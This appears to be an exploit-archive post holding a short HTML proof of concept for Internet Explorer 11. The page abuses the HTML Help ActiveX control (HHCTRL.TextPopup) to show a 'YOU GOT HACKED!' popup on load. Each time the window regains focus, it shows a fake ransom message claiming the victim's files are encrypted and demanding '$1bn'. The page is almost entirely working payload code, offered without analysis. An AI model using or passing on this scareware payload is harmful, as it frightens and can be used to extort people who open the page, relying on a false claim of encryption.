IE11 HTML Help ActiveX

时间:2023-03-09 05:55:36
IE11 HTML Help ActiveX
<!--by: @qab-->
<OBJECT
id=HHCTRL type="application/x-oleobject"
classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" >
</OBJECT> <script>
setTimeout(function(){
HHCTRL.TextPopup('YOU GOT HACKED!',"MS Sans Serif, 101, , BOLD",,,,)//<-- last ints are width,height,textColor,bgColor
},);
window.onfocus=function(){ setTimeout(function(){
HHCTRL.TextPopup('YOU CANNOT ESCAPE!\nAll your files have been base64 encrypted\n$1bn or deleted!',"MS Sans Serif, 101, , BOLD",,,,)
},);
}
</script>